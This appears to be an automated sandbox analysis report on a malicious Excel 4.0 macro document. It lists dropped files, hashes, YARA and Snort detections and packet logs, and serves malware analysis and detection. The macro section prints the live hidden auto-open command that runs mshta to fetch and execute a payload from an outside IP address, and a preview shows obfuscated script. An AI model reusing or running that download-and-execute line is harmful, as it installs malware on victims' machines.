                                                                                                                                                          Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\32E3.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1536
                                                                                                                                                          Entropy (8bit):1.1464700112623651
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                          MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                          SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                          SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                          SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF1BB61ECC9B3BBC2F.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):28672
                                                                                                                                                          Entropy (8bit):3.5189161831469296
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                                                                                                                                          MD5:06A30014EFAE12913C829BE85DD271EC
                                                                                                                                                          SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                                                                                                                                          SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                                                                                                                                          SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFF6B21B165CF142C7.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8016
                                                                                                                                                          Entropy (8bit):3.581539251116374
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:chQC4MqeqvsqvJCwosz8hQC4MqeqvsEHyqvJCworazKAY7HXUVXPlUVeA2:cmfosz8mjHnorazK/UVX9A2
                                                                                                                                                          MD5:0EF4DD16FBE577D9E72979EFF742E047
                                                                                                                                                          SHA1:8112CA599FA9F4506D41BC3FCA039DCA637893FE
                                                                                                                                                          SHA-256:20BAD3FDE9D549EC867DA956BB8EA1A26C44A5CA2881ADB9ADD9F61C8D7BBD1A
                                                                                                                                                          SHA-512:DD83B8F20F06E0B4CB5A8BAD77C7FABED7D48EC1C0F7163899D94C15BF53BA9C4E338A8D4BABA430DAE06ADD357B2AF00E3316DAD189755C77896F8AC702941D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SB1XCP0W8QF39BX3SXV1.temp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8016
                                                                                                                                                          Entropy (8bit):3.581539251116374
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:chQC4MqeqvsqvJCwosz8hQC4MqeqvsEHyqvJCworazKAY7HXUVXPlUVeA2:cmfosz8mjHnorazK/UVX9A2
                                                                                                                                                          MD5:0EF4DD16FBE577D9E72979EFF742E047
                                                                                                                                                          SHA1:8112CA599FA9F4506D41BC3FCA039DCA637893FE
                                                                                                                                                          SHA-256:20BAD3FDE9D549EC867DA956BB8EA1A26C44A5CA2881ADB9ADD9F61C8D7BBD1A
                                                                                                                                                          SHA-512:DD83B8F20F06E0B4CB5A8BAD77C7FABED7D48EC1C0F7163899D94C15BF53BA9C4E338A8D4BABA430DAE06ADD357B2AF00E3316DAD189755C77896F8AC702941D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                                          C:\Users\user\Desktop\2022-28-01_1202.xls

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):86528
                                                                                                                                                          Entropy (8bit):7.100284561770905
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3H:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxH
                                                                                                                                                          MD5:B8E083C3F5D575B0F43A4B17C08361BD
                                                                                                                                                          SHA1:B0551FC012F37F0F9F0FFF11DFAD9399E943686E
                                                                                                                                                          SHA-256:59994E52782930FB06FE63D615C7B97A5EC8A08462528053212C6B0F42E6A83D
                                                                                                                                                          SHA-512:B33633E1E7EDCFE936BCC8D5804136525442221D2423F3384967E418B83490FE3B2FB06B04D1A5650CD495FB5996624C2D2556298EC4E989A09BC0B2AB3C2042
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\2022-28-01_1202.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                                          • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\2022-28-01_1202.xls, Author: Joe Security
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                                                                                                                                          C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):548864
                                                                                                                                                          Entropy (8bit):6.980507701343226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvryMwWd3DYr6i64/:OUBPSczbeeTnvDZDWA
                                                                                                                                                          MD5:F8B4320DCDF37690102B2F93403BD32C
                                                                                                                                                          SHA1:E21CB5655B3094F322CDAEC4C0F359905F8A7949
                                                                                                                                                          SHA-256:21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
                                                                                                                                                          SHA-512:13920D1CF9C9EF7329F402183AAFB8B9709A202326A67A141C9A0AA971DE8EECE9C94B47A9D7132A04B09289CD6F4824987E79ED7FDD97ECD26B8AB876E309C8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: 2022-28-01_1203.xls, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                                                          Entropy (8bit):7.0722277805318345
                                                                                                                                                          TrID:
                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                          File name:2022-28-01_1202.xls
                                                                                                                                                          File size:87044
                                                                                                                                                          MD5:e31371453defbbf8840b40b5bff8600a
                                                                                                                                                          SHA1:bf7b00bc9192d147adc9d2fa52c69fe796e55d67
                                                                                                                                                          SHA256:7649a43612652c0b32353e7ae9898150f885a770db0d024d0d034c4171d5d684
                                                                                                                                                          SHA512:7bae41a270fc60e8b1d824d2c4df91bafe28e7ebea1dec843935e27125e2b41fdb50c290f53b47e4a61f72d0728918365dd0ae12b282897366b44eb05dae7d3e
                                                                                                                                                          SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4eea286a4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "2022-28-01_1202.xls"

                                                                                                                                                          Indicators
                                                                                                                                                          Has Summary Info:True
                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                          Encrypted Document:False
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:True
                                                                                                                                                          Summary
                                                                                                                                                          Code Page:1251
                                                                                                                                                          Author:xXx
                                                                                                                                                          Last Saved By:xXx
                                                                                                                                                          Create Time:2022-01-27 23:41:00
                                                                                                                                                          Last Saved Time:2022-01-28 06:31:03
                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                          Security:0
                                                                                                                                                          Document Summary
                                                                                                                                                          Document Code Page:1251
                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                          Company:
                                                                                                                                                          Contains Dirty Links:False
                                                                                                                                                          Shared Document:False
                                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                                          Application Version:1048576

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.324918127833
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00
                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.263079431268
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002
                                                                                                                                                          General
                                                                                                                                                          Stream Path:Workbook
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                          Stream Size:76002
                                                                                                                                                          Entropy:7.62172227998
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                          Name:REEEEEEEE
                                                                                                                                                          Type:3
                                                                                                                                                          Final:False
                                                                                                                                                          Visible:False
                                                                                                                                                          Protected:False
                                                                                                                                                          REEEEEEEE3False0Falsepost2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()
                                                                                                                                                          Name:REEEEEEEE
                                                                                                                                                          Type:3
                                                                                                                                                          Final:False
                                                                                                                                                          Visible:False
                                                                                                                                                          Protected:False
                                                                                                                                                          REEEEEEEE3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

                                                                                                                                                          Network Behavior

                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                          01/29/22-00:14:28.408085TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.172

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 29, 2022 00:14:24.091348886 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.150247097 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.150337934 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.156452894 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.215390921 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216399908 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216447115 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216474056 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216484070 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216500998 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216530085 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216566086 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216573954 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216602087 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216612101 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216613054 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216658115 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216665030 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216698885 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216701031 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216737986 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216747999 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216768026 CET804916591.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:24.216778994 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.216806889 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:24.230876923 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:28.343738079 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:28.406053066 CET804916691.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:28.406125069 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:28.408085108 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:28.471127987 CET804916691.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:28.471710920 CET804916691.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:28.471724987 CET804916691.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:28.471776962 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:28.551435947 CET4916780192.168.2.22164.90.147.135
                                                                                                                                                          Jan 29, 2022 00:14:31.546515942 CET4916780192.168.2.22164.90.147.135
                                                                                                                                                          Jan 29, 2022 00:14:36.320300102 CET4916580192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:14:37.545020103 CET4916780192.168.2.22164.90.147.135
                                                                                                                                                          Jan 29, 2022 00:14:49.808434010 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:49.986368895 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:49.986500978 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:49.986639977 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.164741993 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175324917 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175354958 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175368071 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175389051 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175405979 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175421953 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175437927 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175453901 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175467014 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175482035 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175498009 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.175539017 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.175544024 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353693962 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353732109 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353746891 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353760004 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353774071 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353790998 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353809118 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353821993 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353837013 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353866100 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353874922 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353883982 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353897095 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353910923 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353916883 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353916883 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353935003 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353950024 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353951931 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353970051 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353975058 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353982925 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354000092 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354008913 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.354016066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354033947 CET8049168103.206.244.105192.168.2.22
